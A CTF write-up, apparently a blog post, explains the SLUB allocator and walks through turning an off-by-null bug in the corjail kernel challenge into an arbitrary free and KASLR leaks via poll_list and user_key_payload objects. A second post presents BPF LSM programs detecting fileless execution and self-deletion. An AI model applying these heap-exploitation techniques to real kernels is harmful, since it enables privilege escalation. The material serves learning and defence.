Summarizing our findings, the primitive granted by the bug is a linear heap overflow of size one where the written data is always a zero byte. Given the fact that our vulnerability involved the heap, it is probably worth the wile to learn a bit about kernel’s memory allocation algorithm.

SLUB Cash Course

For most people interested in exploitation, the first memory allocator that they studied is probably the malloc implementation of glibc. It is a fundamental component of virtually all Linux user space applications and consequently, much research has gone into exploiting it and there is ample literature on the subject.

However, there are many other ways to implement an allocator for small chunks of memory. For example, Android recently switched to using the Scudo allocator, which was developed with a special focus on security [8] [9].

When you leave user space and enter kernel land, things change. First of all, as of this writing, you can still choose between three different allocators at compile time: SLAB, SLUB and SLOB. Luckily, during the 6.4 merge window, that is the 2-week period in a kernel development cycle where disruptive changes can be merged into the kernel, the death of SLOB was decided. Furthermore, the removal of the SLAB allocator is on the to-do list of memory management developers [10]. Our challenge’s kernel is using the SLUB allocator, which will hopefully become the only remaining allocator at some point in the future.

Nevertheless, as it is the case with most aspects of the kernel, its allocator can be extensively configured at compile-time. Some aspects may also be configured at boot or run-time. Our discussion will be tailored to the configuration of the challenge’s kernel and I will mention the relevant compile-time definitions along the way.

The first difference between glibc’s malloc and SLUB is that SLUB is a so-called slab-allocator. (Note to avoid confusion: The word slab-allocator refers to a particular design for building memory allocators, which is popular in operating system kernels [11]. A slab, on the other hand, is a particular component in this design that is not to be confused with SLAB, which is a Linux kernel implementation of a slab-allocator.)

The buffers handed out by such an allocator are taken from contiguous memory ranges (typically between one and sixteen pages in size), which are logically subdivided into fixed size slots. Those memory ranges are called slabs.

Each slab is part of exactly one so-called cache. A cache is nothing but a collection of slabs that all have the same slot size. Allocation requests are always (implicitly or explicitly) made against a specific cache, which might in turn create itself a fresh slab to serve the request.

Here’s my attempt at illustrating the above concepts in a drawing.

For example, in the Linux kernel there is the kmalloc family of caches. Those caches typically cover slot sizes from 32 to 8192 bytes and for each size there are multiple caches with different characteristics. When you read kernel code and see a call like

...
buf = kmalloc(size, GFP_KERNEL);
...

the allocation request will be directed towards a cache of the kmalloc family. However, be aware that when reverse engineering you will not see any calls to kmalloc in the disassembly because of compiler inlining. In the cormon_proc_write function, for example, the source code contains a call to kmalloc while the above listing shows a call to kmem_cache_alloc_trace.

Importantly for us, even same size allocation requests might be served from different caches when the second argument differs. Caches in the kmalloc family are also known as “general purpose” caches, as their buffers are used for many different kinds of objects by the kernel.

The other thing that you will frequently see are allocation requests that are explicitly directed towards a specific cache.

...
/* SLAB cache for sighand_struct structures (tsk->sighand) */
struct kmem_cache *sighand_cachep;
...
newsighand = kmem_cache_alloc(sighand_cachep, GFP_KERNEL);
...

Those caches often hold only objects of a specific type or are only used within a certain module.

The second difference has to do with the fact that the kernel is a highly parallel program with complete control over the hardware. While glibc’s malloc has many features to speed up memory allocations in multi-threaded programs by using per-thread data structures, the kernel is making heavy use of per-CPU data structures to improve the performance of the allocator implementation.

For each cache every logical CPU has its own private set of slabs for serving allocations. Among them, the slab that served the last allocation is the so-called CPU slab for that cache, all others are referred to as partial slabs. Note that the allocator does not track full slabs at all. It only becomes aware of them once one of their objects is freed.

What is more, in computing there is the concept of non-uniform memory access (NUMA) machines, where, while every CPU can access all physical memory, there is a certain region that is “fast” to access. Here, CPUs with the same “fast region“ form so-called NUMA-nodes. As another optimization, each node maintains its own set of per-node partial slabs for every cache.

When severing an allocation request, the cache algorithm first checks the CPU slab. This slab has two freelists, a lockless freelist private to the owning CPU and the normal slab freelist, which might require locking. After checking those two, the partial slabs followed by the per-node partial slabs are consulted. On the way the algorithm opportunistically populates the empty lists from the currently checked one. If no existing slab is found, a new one is created and set as the CPU slab.

During a free operation, the slot is added to the freelist (LIFO) of the slab it belongs to. The only exception is freeing an object in a CPU slab on its owning CPU. In that case the slot goes to the lockless freelist. If the slab was previously full, then the CPU opportunistically adds it to its list of partial or per-node partial slabs. There’s one detail concerning a slab’s freelist worth mentioning at this point: for each slab the order in which its slots appear on its initial freelist is randomized during slab creation. Furthermore, freeing the last object in a partial slab might lead to its destruction if the CPU already has a sufficient number of empty slabs.

Here’s my attempt at illustrating the above concepts in a drawing.

Those are the core concepts of the SLUB allocator that are needed to understand the exploit and follow the decisions made. Some further aspects will be introduced along the way once we need them.

However, the topic is of course much richer, and I encourage you to have a look at one of the following references to dive deeper: [12], [13], [14]. After reading one or two of them, what helped me was having a look at the code in mm/slub.c and walking through allocations and frees in a debugger. It might also be instructive to have a look at gdb extensions that implement SLUB debugging [15] [16] (or writing your own) as well as special purpose debugging tools used by kernel developers [17]. At this point we will end our digression on SLUB internals and apply our newfound knowledge to solve the challenge at hand.

SLUB Exploitation Crash Course

In this section, we will discuss the implementation details described above from an exploitation perspective.

Generally, one can distinguish between exploitation techniques that target the heap implementation and those that target the data stored on the heap. We are going to be focusing on the latter.

First, the per-CPU design implies that we must carefully control on which CPU we trigger allocations and frees. For example, when we trigger an arbitrary free while executing on CPU0, it might very well be impossible to reclaim the freed slot by spraying objects from another CPU. That is since the freed slot might end up on the freelist of a slab that is private to CPU0. Fortunately, the kernel lets a process choose the set of CPUs it would like to run on and will be making heavy use of this during our exploit [18].

Secondly, we would like to minimize unexpected allocations, i.e., changes to the allocator state that we cannot predict. There are several sources of unexpected allocations, only some of which we can control.

The first category are allocations that are directly caused by our exploit process. For instance, due to system calls or exceptions that we trigger. This is one reason we are using a low-level systems language, C in this case, for writing our exploit program. Doing this gives us a high degree of control over the allocations the kernel performs in the context of our process. One might ask why we do not use a high-level language like Python or Java Script for writing the exploit, and one reason is that here the language runtime would introduce too much noise in the form of unexpected allocations. To further minimize changes to the CPU’s allocator state, we can perform actions that inevitably cause unwanted allocations, like spawning threads or new processes, on another CPU.

The second category are allocations caused by other processes that we are sharing the CPU with. For example, suppose that we start our exploit by allocating a vulnerable object (Note: that being the lingo for an object that “contains” a vulnerability such as an out-of-bounds memory write). Then, our process gets scheduled out, i.e., another process gets to run on the CPU, before we can allocate the victim object (Note: that being the lingo for an object that we would like to “attack” with the vulnerable object, e.g., by overwriting some pointer inside it). The other process might then cause lots of allocations that fill up the slab containing the vulnerable object, shattering our dreams of causing a successful memory corruption once we get the CPU back. To mitigate this risk, we can exploit the fact that the kernel tries to spread load evenly across CPUs and that we can split tasks between independent streams of execution [19]. For example, by spraying the victim object from many treads pinned to the same CPU, recall that threads are scheduled independently of each other, we can increase the chance of a successful exploit. In case our main thread gets scheduled out, another thread of ours might get the CPU and successfully allocates the victim object. Furthermore, we can fill the CPUs run queue, that being the list of processes that the scheduler can choose from on a context switch, with processes that yield the CPU in a loop. Yielding means that the task requests to be moved to the back of the run queue. The goal of this exercise is to force the load-balancer to migrate unrelated tasks to other CPUs while maximizing the CPU time of our exploit process. Yet another technique to mitigate the risk of losing the CPU at an inconvenient moment is to measure the time our process spends on and off the CPU before we begin a critical section, i.e., a code segment during which we do not want to have the CPU taken away from us. By performing those measurements, we can begin the critical section directly after we got the CPU back from some other process. The underlying assumption here is that the likelihood of losing the CPU during some next infinitesimal time interval increases monotonically with the time that we have already had it. Different scheduling classes, scheduling priorities, scheduling parameter, interrupts, preemption, system load, ect. make the exact functional dependence non-trivial and certainly, non-constant, but to me the general assumption still seems justified. However, it would surely be worthwhile to perform some measurements to evaluate those techniques.

The third category are frees of objects in one of our CPU’s partially filled slabs that happen on a foreign CPU. This can be mitigated against by filling all partial slabs prior to exploitation (see below). Foreign CPUs will now free objects in full slabs, which results in the now partial slab being moved to their partial list.

The last category are allocations that are happening during interrupts. To the best of my knowledge, there is not much we can do about them.

In the previous section, we already mentioned that the allocation size is not the only parameter that influences which cache serves an allocation request. For example, depending on the kernel version and configuration, reclaiming the slot of an object that was allocated by a call to kmalloc with GFP_KERNEL_ACCOUNT by spraying objects that have the same size but are allocated with GFP_KERNEL is a hopeless ordeal. This is since the objects are allocated in different caches. In general, this problem can be overcome by draining the slab, which, as you maybe recall, causes it to be destroyed and handed back to the page allocator, and then re-using the very same memory for a slab in another cache. (Note: The page allocator, also known as the Buddy Allocator, is used by the kernel to allocate one or more pages of contiguous memory). I other cases it might be viable to “spray slabs” to create a memory layout where slabs belonging to different caches are adjacent. This can then be used to perform cross cache overflows or to exploit partial pointer overwrites.

Finally, there is the problem posed by an unknown allocator state, i.e., number, fill status and object composition of existing per-CPU and per-node slabs when we start our exploit. We can normalize the heap state by performing a large number of allocations, followed by freeing a slab worth of them to force a state where there is an empty CPU slab and a single partial slab. In the literature this technique is often called defragmentation and I tried to illustrate its effect in the following drawing.

However, being able to create an allocator state with an empty CPU slab does not imply that is is trivial to control the relative positioning of vulnerable and victim object allocations. One reason why this is still hard is due to the randomization of the order in which the slots of the slab are handed out by the allocator. To successfully exploit an out-of-bounds write, for example, one can try to allocate the vulnerable object in a slab that’s otherwise filled with victim objects. If the vulnerable object offers an out-of-bounds read, or other information leak primitives, they might as well be used to defeat the mitigation.

Of course I can not, and probably should not attempt to, give a comprehensive overview of heap exploitation and exploit stabilization techniques at this point. I tried to focus on the things that will become relevant in the exploit we discuss below, but there is a lot more one could say about the topic. For example, you could read about cross cache attacks [20] [21], attacking the implementation [22] or completely re-purposing the slab’s pages [23]. This recent paper by Kyle et al. might also be a good starting point [24].

Constructing an Arbitrary Free Primitive

Recall that the bug is essentially giving us the following primitive

filter = kmalloc(4096, GFP_KERNEL_ACCOUNT);
...
filter[4096] = 0;

In other words, we can write a single null byte out of bounds in a kmalloc-4k slab.

What can we do with that primitive? Of course, we can look up possible answers as there are public exploits for this challenge, but let’s nevertheless go through some ideas.

Brandon Azad of Google Project Zero defines an exploit strategy as “The low-level, vulnerability-specific method used to turn the vulnerability into a useful exploit primitive.” [25]. Our bug already gives us a useful, albeit rather weak, primitive. Thus, what we need is an exploit technique, i.e., “A reusable and reasonably generic strategy for turning one exploit primitive into another (usually more useful) exploit primitive.”. We can gather ideas for possible exploit techniques by looking at public exploits that had similar primitives, a good starting point would be Google’s Kernel Exploits Recipes Notebook [26], but there is probability no way around reading lots of blog posts.

One idea would be to corrupt the reference count of an adjacent victim object. Many kernel objects have a field that keeps track of the number of entities that are using the object. When some entity releases its reference, it is checked whether they were the last one holding on to the object, and in that case, the object will be destroyed. Thus, by using our corruption primitive to decrement a refcount we could maybe cause a use-after-free over some victim object.

Another idea would be to corrupt the flags of an object, causing it to be handled in an unexpected manner. Yet another common ansatz would be to corrupt a length field in some victim structure to subsequently exploit flawed bounds checks on the corresponding buffer. However, the latter idea suffers from the fact that our primitive can only ever decrease a value, which is maybe not what we want to do with a length.

While all those ideas might very well work, we will go with another typical target of partial overwrites: pointers. Roughly speaking, there are three kinds of pointers that might be present in a victim structure: function pointers, data pointers, or linked list pointers. But how do find objects that have an interesting pointer as the first member?

Since we compiled the kernel with debugging information we can use the pahole tool to list kernel structs. (The –E expands embedded structs and typedefs, whereas the other two commands generate lists of object sizes and variable-size objects, respectively.)

$ pahole --structs -E vmlinux > /tmp/pahole_vmlinux_E
$ pahole -s vmlinux > /tmp/pahole_vmlinux_s
$ pahole --with_flexible_array vmlinux > /tmp/pahole_vmlinux_flex

From now on, which kinds of queries we can make against the set of kernel objects is only limited by our command over the chaining of core UNIX utilities. For example, we can generate a list of the 5 biggest structs that start with a function pointer.

sm_metadata 25200
sm_disk 8752
e1000_mac_info 768
poll_wqueues 560
net_device_ops 560

However, upon closer inspection, none of those objects looks like it can be allocated in kmalloc-4k. Generating the list of all structs that start with a function pointer and have a flexible array member yields the following set

ahash_request_priv
ff_device
pci_packet
pm_clk_notifier_block
Qdisc

Again, none of those structures looks like we can control its allocation in kmalloc-4k, and even if we could, it is questionable whether the partial overwrite of the function pointer would be of any use.

Using a memory corruption primitive for attacking linked lists has an awfully long history in exploitation. For example, TheFlow used a two null byte OOB write to corrupt the list linking messages in a POSIX message queue [27]. While we cannot use this technique due to our container’s seccomp filter, we will go with the general idea.

One idea to exploit the fact that some object is know unknowingly part of the list is to trigger a clean up of the list to arbitrarily free the object. In pictures, this means turning into

We can try to identify structs that are potentially chained in such a way by generating a list of all structs that start with a member of type “pointer-to-own-struct-type”. Again, there is no object with a size that could end up in kmalloc-4k, but filtering for flexible array members yields a somewhat short list.

bio
hpets
mmu_gather_batch
neighbour
nh_group
pneigh_entry
poll_list
poll_table_page
sched_domain
sched_group

(Note: You might wonder why the above-mentioned messages are not appearing in this list. This is since they linked using the kernels list management api, the stuct list_head to be concrete. Including those is left as an exercise for the reader.)

Identifying some struct that looks like it might be a suitable victim object is good, however, we still need to verify that we are able to reliably allocate it next to the vulnerable object. Furthermore, the way in which the object is used after the corruption must provide us with a useful exploitation primitive without endangering system stability.

It would be interesting to develop a more sophisticated solution that allows for more complex queries against the set of kernel structures. Combining it with compile-time static analysis for finding allocation sites and run-time tracing to identify reaching code paths could improve the seemingly very manual process of victim object discovery.

The above list already includes our victim-of-choice, the poll_list. It was discovered by the challenge author, and it seems likely the challenge was designed with that abject in mind.

By reading its man page we can learn that the poll system call allows a process to pass the kernel a table whose rows consist of a file descriptor and a list of events that might occur on it [28]. When one of those events occurs, the system call will return, and the third column will indicate which events occurred. Imagine, for example, a single threaded asynchronous server that has many open connections to clients, each represented by a file descriptor. The server may then serve all those clients by using poll to get notified when new data arrives on any of those connections. The other parameter of the poll system call is the timeout in milliseconds before it will unconditionally return.

Internally, the kernel saves the table in a singly linked list of poll_list objects. The first few rows are saved on the kernel stack as a performance optimization {1}, while the rest is split into chunks of 510 rows {2}, which are allocated in kmalloc-4k {3}. The last, potentially smaller, chunk might end up in another cache, kmalloc-32 in our case.

static int do_sys_poll(struct pollfd __user *ufds, unsigned int nfds,
		struct timespec64 *end_time)
{
	struct poll_wqueues table;
	int err = -EFAULT, fdcount, len;
	/* Allocate small arguments on the stack to save memory and be
	   faster - use long to make sure the buffer is aligned properly
	   on 64 bit archs to avoid unaligned access */
	long stack_pps[POLL_STACK_ALLOC/sizeof(long)]; // {1}
	struct poll_list *const head = (struct poll_list *)stack_pps;
 	struct poll_list *walk = head;
 	unsigned long todo = nfds;

	if (nfds > rlimit(RLIMIT_NOFILE))
		return -EINVAL;

	len = min_t(unsigned int, nfds, N_STACK_PPS);
	for (;;) {
		walk->next = NULL;
		walk->len = len;
		if (!len)
			break;

		if (copy_from_user(walk->entries, ufds + nfds-todo,
					sizeof(struct pollfd) * walk->len))
			goto out_fds;

		todo -= walk->len;
		if (!todo)
			break;

		len = min(todo, POLLFD_PER_PAGE); // {2}
		walk = walk->next = kmalloc(struct_size(walk, entries, len),
					    GFP_KERNEL); // {3}
		if (!walk) {
			err = -ENOMEM;
			goto out_fds;
		}
	}

	poll_initwait(&table);
	fdcount = do_poll(head, &table, end_time); // {4}
	poll_freewait(&table);

	if (!user_write_access_begin(ufds, nfds * sizeof(*ufds)))
		goto out_fds;

	for (walk = head; walk; walk = walk->next) { // {5}
		struct pollfd *fds = walk->entries;
		int j;

		for (j = walk->len; j; fds++, ufds++, j--)
			unsafe_put_user(fds->revents, &ufds->revents, Efault);
  	}
	user_write_access_end();

	err = fdcount;
out_fds:
	walk = head->next;
	while (walk) { // {6}
		struct poll_list *pos = walk;
		walk = walk->next;
		kfree(pos);
	}

	return err;

Efault:
	user_write_access_end();
	err = -EFAULT;
	goto out_fds;
}

Afterwards, the kernel will periodically check on all the file descriptors in the call to do_poll {4}. When a requested event occurs, or the timeout fires, the call returns, and the kernel will walk through the list and copy the occurred events back to user space {5}, freeing the list of poll_list objects afterwards {6}.

The number of objects in a kmalloc-4k slab on our target system is eight. Consequently, the ideal memory layout for exploiting our off-by-null bug would be to have seven victim poll_list objects and one vulnerable syscall filter object in the same slab.

Then, there is a 7/8 probability of writing to a next pointer of a poll_list, with a chance that the remaining cases write to unused memory after the slab and thus maybe do not cause a kernel crash.

There’s another 7/8 chance that we actually corrupt the next pointer, with the other cases being ones where it already ends in a null byte. Those are also retryable.

If we manage to trigger a corruption, we would like to maximize the probably that the corrupted pointer now points to a victim object. Consequently, we would like 121 of the 128 objects in the kmalloc-32 slab to be victim objects, with the other seven objects being the next poll_list objects. Therefore, assuming that the pointer was corrupted, there is a 121/127 chance that it now points to a victim object, with the other cases being the ones where it points to another poll_list. While the double-free that occurs in the latter case is very likely to lead to a kernel crash down the road, an overall best-case 121/127 probability of a successful arbitrary free is not too bad. (Best-case as there are rare occasions where other effects interfere with our allocations, c.f., the above discussion.)

The following drawing illustrates the desired memory layout. By corrupting the next pointer of the second-to-last node in a singly linked list of poll_list objects we include an unsuspecting victim object in the list. Returning from the system call triggers the list cleanup and arbitrarily frees the victim object.

Exploiting the Arbitrary Free

In theory, we now know how to turn our OOB write into an arbitrary free primitive. However, we still need to implement and execute it. Furthermore, there remains the open question of: what is it that we want to free?

Since our partial override can only divert the next pointer to an object in the same slab as the original one, the victim must live in kmalloc-32 as well. Luckily for us, there exists previous research on victim objects, which also considered where they can be allocated [29], [30]. They already identified user_key_payload as an object with some pleasant properties. For some background on the in-kernel key management and retention facility, see [31].

struct user_key_payload {
	struct callback_head {
		struct callback_head * next;                                             /*     0     8 */
		void               (*func)(struct callback_head *);                      /*     8     8 */
	}rcu; /*     0    16 */
	short unsigned int         datalen;                                              /*    16     2 */

	/* XXX 6 bytes hole, try to pack */

	char                       data[];                                               /*    24     0 */

	/* size: 24, cachelines: 1, members: 3 */
	/* sum members: 18, holes: 1, sum holes: 6 */
	/* last cacheline: 24 bytes */
};

The struct is a simple container for user-supplied data, where the length of the data is stored alongside it in the datalen field. Crucially, the kernel will consult this length field when copying the data back to user space [32]. Thus, by aiming our arbitrary free at this object we can easily create an information leak from the resulting use-after-free. At this point, the attentive reader might spot a potential problem. Recall how the kernel cleans up the poll_list:

while (walk) {
	struct poll_list *pos = walk;
	walk = walk->next;
	kfree(pos);
}

i.e., we potentially jeopardize system stability if the first QWORD of the victim object is not under our control. This is where the second useful property of user_key_payload becomes important: its first two QWORDs are not initialized on allocation. However, this only leads us to the next problem: how to initialize them?

Back in 2018 Vitaly Nikolenko invented the “universal heap spray” that, in essence, allowed the allocation of an arbitrary amount of data in arbitrary caches [33]. One part of the technique involved the observation that the setxattr system call essentially makes an allocation with a user-controlled size and then fills it with user-controlled data [34] [35]. The problem with heap spraying, however, is that the buffer is freed when the syscall returns. In our case that is not a problem at all as it provides a reliable way to initialize heap memory. In particular, by reclaiming the chunk used during the setxattr operation when allocating the key, we ensure that confusing our key for a poll_list does not cause unpredictable behavior during list cleanup. To speed up this preparatory step, we can make the copy_from_user operation fail at the last byte, e.g., by letting it run into unmapped memory, to skip the rest of the syscall.

To create the memory layout sketched above, we begin by normalizing the kmalloc-4k and kmalloc-32 caches as described in the section on SLUB exploitation [36]. Then, we start seven threads to allocate the poll_list objects, and another thread to allocate user_key_payload objects [37]. While using threads for polling is necessary due to the blocking nature of the system call, using threads for the keys is optional, but might reduce the chance of unexpected allocations due to the scheduling of an unrelated task. The main thread triggers the memory corruption once all poll_list objects are allocated [38].

We continue by preparing a favorable type confusion over the victim object. For that purpose, we allocate many seq_operations structs after freeing the user_key_payload. The former is a well-known struct full of kernel function pointers, that is allocated whenever single_open is called, e.g., when opening “/proc/self/stat”. As the two least significant bytes of a function pointer now corrupted the datalen of the user_key_payload, reading it back gives us a substantial chunk of kernel heap data.

Aside: One neat optimization that we can do at this point is to start spraying as soon as the corruption has happened. The thread whose poll_list was corrupted can notice the fact by priming the revents of the last two pollfd with a magic value. Usually, the kernel will overwrite them before returning.

for (walk = head; walk; walk = walk->next) {
	struct pollfd *fds = walk->entries;
	int j;

	for (j = walk->len; j; fds++, ufds++, j--)
		unsafe_put_user(fds->revents, &ufds->revents, Efault);
}

However, when confusing the user_key_payload for a poll_list the walk->entries will be zero and the magic value will remain [39].

While the function pointer leak breaks kernel address space layout randomization (KASLR) we require more leaks in order to successfully finish our exploit. First, we would like to use our arbitrary free primitive again to cause a more powerful use-after-free, but for that to work, we need to know the address of an object to aim at. Second, the kernel image is not the only region that is affected by KASLR. There is also the kernel’s direct map and the array of page structures used to manage it [40]. We will make use of all those leaks later.

The good news is we can collect all those addresses in one sweep. In preparation for this step, we first free up some space in the affected slab by releasing all but the corrupted user_key_payload. Opening a pseudo-terminal, i.e., “/dev/ptmx”, causes many allocations [41]. Two of those land in kmalloc-32 and can thus be exposed by our OOB read primitive. The first one is a tty_file_private, which is part of a doubly linked list hanging off the tty_struct, connecting it to all files open for it. Leaking its contents gives us the address of the tty_struct as well as a file, both of which are attractive targets for an arbitrary free [42] [43]. The second one is caused by a call to kvmalloc, which internally allocates a small buffer to hold pointers to the pages it allocated [44]. We will elaborate on the conditions under which those leaks are sufficient to deduce the base address of the respective memory regions in the next post.

Wrap Up

We started our journey by setting up an exploit development environment, which we then used to interactively explore the challenge. After that, we reverse-engineered the vulnerable driver to discover an off-by-null bug. A brief introduction to the SLUB allocator and current heap exploitation methods was needed to understand and implement the technique used to turn the bug into an arbitrary free primitive. Finally, we exploited the arbitrary free to leak the base addresses of three separately randomized kernel memory regions and two heap-allocated kernel structures.

The above-mentioned video recording contains a live debugging session with all the exploit steps discussed here. You can try it out locally by installing the kernel debugging setup and compiling the exploit repository.

In the next post, we will, step-by-step, gain stronger exploit primitives, ending up with arbitrary kernel read/write or arbitrary code execution via ROP.

References

[0] https://www.youtube.com/playlist?list=PLhixgUqwRTjwufDsT1ntgOY9yjZgg5H_t

[2] https://2022.cor.team/

[3] https://github.com/Crusaders-of-Rust/corCTF-2022-public-challenge-archive/tree/master/pwn/corjail

[4] https://syst3mfailure.io/corjail/

[5] https://github.com/0xricksanchez/like-dbg

[6] https://github.com/vobst/like-dbg-fork-public

[7] https://github.com/vobst/ctf-corjail-public

[8] https://android-developers.googleblog.com/2020/06/system-hardening-in-android-11.html

[9] https://www.llvm.org/docs/ScudoHardenedAllocator.html

[10] https://lwn.net/Articles/932201/

[11] https://en.wikipedia.org/wiki/Slab_allocation

[12] https://blogs.oracle.com/linux/post/linux-slub-allocator-internals-and-debugging-1

[13] https://events.static.linuxfound.org/sites/events/files/slides/slaballocators.pdf

[14] https://events.static.linuxfound.org/images/stories/pdf/klf2012_kim.pdf

[15] https://github.com/nccgroup/libslub

[16] https://github.com/PaoloMonti42/salt

[17] https://www.kernel.org/doc/Documentation/vm/slub.txt

[18] https://man7.org/linux/man-pages/man2/sched_setaffinity.2.html

[19] https://lwn.net/Articles/793427/

[20] https://etenal.me/archives/1825

[21] https://www.willsroot.io/2022/08/reviving-exploits-against-cred-struct.html

[22] https://grsecurity.net/how_autoslab_changes_the_memory_unsafety_game

[23] https://yanglingxi1993.github.io/dirty_pagetable/dirty_pagetable.html

[24] https://github.com/sefcom/KHeaps

[25] https://googleprojectzero.blogspot.com/2020/06/a-survey-of-recent-ios-kernel-exploits.html

[26] https://docs.google.com/document/d/1a9uUAISBzw3ur1aLQqKc5JOQLaJYiOP5pe_B4xCT1KA/edit#heading=h.nqnduhrd5gpk

[27] https://google.github.io/security-research/pocs/linux/cve-2021-22555/writeup.html

[28] https://man7.org/linux/man-pages/man2/poll.2.html

[29] https://zplin.me/papers/ELOISE.pdf

[30] https://github.com/smallkirby/kernelpwn/blob/master/structs.md#user_key_payload

[31] https://man7.org/linux/man-pages/man7/keyrings.7.html

[32] https://elixir.bootlin.com/linux/v5.10.127/source/security/keys/user_defined.c#L171

[33] https://duasynt.com/blog/linux-kernel-heap-spray

[34] https://elixir.bootlin.com/linux/v5.10.127/source/fs/xattr.c#L511

[35] https://man7.org/linux/man-pages/man7/xattr.7.html

[36] https://github.com/vobst/ctf-corjail-public/blob/1d3395b27644d79c90268ea32250953e2a3b7da3/sploit.c#L350C2-L362C18

[37] https://github.com/vobst/ctf-corjail-public/blob/1d3395b27644d79c90268ea32250953e2a3b7da3/sploit.c#L365C1-L383C1

[38] https://github.com/vobst/ctf-corjail-public/blob/1d3395b27644d79c90268ea32250953e2a3b7da3/sploit.c#L294

[39] https://github.com/vobst/ctf-corjail-public/blob/1d3395b27644d79c90268ea32250953e2a3b7da3/libexp/poll_stuff.c#L124

[40] https://www.kernel.org/doc/html/v5.10/x86/x86_64/mm.html

[41] https://elixir.bootlin.com/linux/v5.10.127/source/drivers/tty/pty.c#L811

[42] https://googleprojectzero.blogspot.com/2022/11/a-very-powerful-clipboard-samsung-in-the-wild-exploit-chain.html

[43] https://github.com/smallkirby/kernelpwn/blob/master/technique/tty_struct.md

[44] https://elixir.bootlin.com/linux/v5.10.127/source/mm/vmalloc.c#L2478

LSMs Jmp’ing on BPF Trampolines

2023-04-24T00:00:00+00:00

Back in 2001, the Linux Security Module (LSM) subsystem made its way into the mainline kernel. Almost 10 years ago, in September 2014, the modern BPF virtual machine (VM) landed in the tree. In late 2019, KP Singh proposed a patchset that facilitates the creation of modules for the former that run on the latter - Kernel Runtime Security Instrumentation (KRSI) was born.

But how does kernel control flow transfer in and out of the VM at the security checkpoints? Originally, this question was raised while developing a memory forensics tool for detecting BPF-based malware, but it quickly became a great learning experience about the internals of the two subsystems. In this post, we will seek an answer to that first question, and then use it to develop the module that detects such hooks in memory images.

However, before we jump into assembly code, let’s briefly recap on LSMs and BPF.

Linux Security Modules

By default, Linux implements discretionary access control. For example, the owner of a resource is free to grant others access to it.

$ chmod 444 .ssh/id_rsa

This is potentially problematic, e.g., on multi-user systems where users have different security clearances. To implement other access control policies, e.g., mandatory access control, organizations like the National Security Agency (NSA) had to maintain their own kernel patches.

At the 2001 Kernel Summit in San Jose, California, the NSA’s Peter Loscocco presented their Security Enhanced Linux (SELinux); but the patchset was not merged. However, one year later at the Kernel Summit in Ottawa, Chris Wright presented the patch that should later become the Linux Security Module subsystem.

Citing its documentation:

The LSM framework includes security fields in kernel data structures and calls to hook functions at critical points in the kernel code to manage the security fields and to perform access control. It also adds functions for registering security modules. An interface /sys/kernel/security/lsm reports a comma separated list of security modules that are active on the system. link

The framework is intended to be generic enough to facilitate enforcing of a wide range of security policies by writing a kernel module that uses those two primitives. But writing kernel modules is hard, mistakes might have catastrophic consequences, and the binary blobs only run on the kernel they were compiled for - but fortunately there is…

Further reading: Linux Security Modules: General Security Support for the Linux Kernel

Modern BPF

BPF is a VM inside the Linux kernel. It is used for running programs in a sandboxed environment within the kernel context.

Programs can be written in C, Rust or even high-level scripting languages. They are compiled to BPF bytecode, which can be dynamically loaded into the kernel where it is statically verified before being compiled to native code. Thus, running BPF programs is safe, in the sense that a programming mistake won’t crash your kernel, as well as low overhead. Furthermore, type information included in modern kernels is used to relocate programs before loading, eliminating the need for compilation on the target system.

By now, the VM is used in many different kernel subsystems, like networking, tracing, security, cgroups or scheduling. In an effort to provide a safer kernel programming environment, it is actively being extended with new features.

Further reading: BPF and XDP Reference Guide

Kernel Runtime Security Instrumentation (KRSI)

This patchset added the option to implement the security callbacks as programs for the BPF VM. For illustration purposes, we are going to use a very simple security module that aims to detect and prevent two common malware behaviors. You can find the full source code here.

Fileless Executions

Using a remote code execution exploit, an attacker might be able to compromise a process running on a victim’s machine. Downloading and executing a second stage payload without touching the filesystem might be desirable due to security measures preventing the creation of (executable) files or to minimize forensic artifacts. While userland exec is a well-known technique, it is much more convenient to use Linux’s memfd API. To detect such events, we can write the following BPF program and attach it to the bprm_creds_for_exec security hook.

SEC("lsm/bprm_creds_for_exec")
int BPF_PROG(bprm_creds_for_exec , struct linux_binprm* bprm)
{
  int nlink = 0;
  char comm[BPF_MAX_COMM_LEN] = { 0 };
  char path[BPF_MAX_PATH_LEN] = { 0 };

  nlink = bprm->file->f_path.dentry->d_inode->__i_nlink; // [1]
  bpf_d_path(&bprm->file->f_path, path, sizeof(path));

  LOG_INFO("path=%s nlink=%d", path, nlink);

  if (!nlink) {
    bpf_get_current_comm(comm, sizeof(comm));
    LOG_WARN("fileless execution (%s:%lu)", comm, bpf_ktime_get_boot_ns());
    bpf_send_signal(SIGKILL); // [2]
    return 1; // [3]
  }

  return 0;
}

This hook is called early during the exec system call and it receives the file that the process wants to execute. At [1] we get the number of hard links to this file. If it is zero, we deny the execution [3] and queue a fatal signal for the process [2]. The latter is necessary since the hook is called before the syscall’s point-of-no-return, after which all errors are fatal.

Note: You can use the memfd_exec program to test this hook. It also allows you to experiment with the differences between executing a script starting with #! and an ELF binary.

Self-Deletion

Less sophisticated malware might simply try to go memory-resident by deleting its executable on disk. We can write another BPF program and attach it to the inode_unlink security hook in an attempt to prevent this behavior.

SEC("lsm/inode_unlink")
int BPF_PROG(inode_unlink, struct inode* inode_dir, struct dentry* dentry)
{
  struct task_struct* current = NULL;
  char comm[BPF_MAX_COMM_LEN] = { 0 };
  const struct inode *exe_inode = NULL, *target_inode = NULL;
  int i = 0;

  target_inode = dentry->d_inode; // [1]

  LOG_INFO("target_inode=0x%lx", target_inode);

  for (i = 0,
      current = bpf_get_current_task_btf(),
      exe_inode = current->mm->exe_file->f_inode; // [2]
      exe_inode && i < BPF_MAX_LOOP_SIZE;
       i++,
      current = BPF_CORE_READ(current, parent),
      exe_inode = BPF_CORE_READ(current, mm, exe_file, f_inode))
  {
    bpf_probe_read_kernel(&comm, sizeof(comm), &current->comm);
    LOG_INFO("exe_inode=0x%lx comm=%s", exe_inode, comm);

    if (target_inode == exe_inode) { // [3]
      bpf_get_current_comm(comm, sizeof(comm));
      LOG_WARN("self-deletion (%s:%lu)", comm, bpf_ktime_get_boot_ns());
      bpf_send_signal(SIGKILL);
      return 1;
    }
  }

  return 0;
}

We attach this program to the inode_unlink hook, which is called each time a process attempts to delete a file. The callback receives the parent directory as well as the directory entry of the file that is to be deleted. First, the dentry is used to obtain the underlying inode [1]. Then, the loop reads the inode of the file that the process (or any of its ancestors) is executing [2]. Finally, by comparing the two [3] we can attempt to detect self-deletions.

Note: This program is flawed in many ways. First, it breaks updates, e.g., when the package manager updates systemd’s executable. Furthermore, it is easy to bypass, e.g.,

The parent deletes its child’s executable and exits. Then, the child gets reparented and deletes the parent.
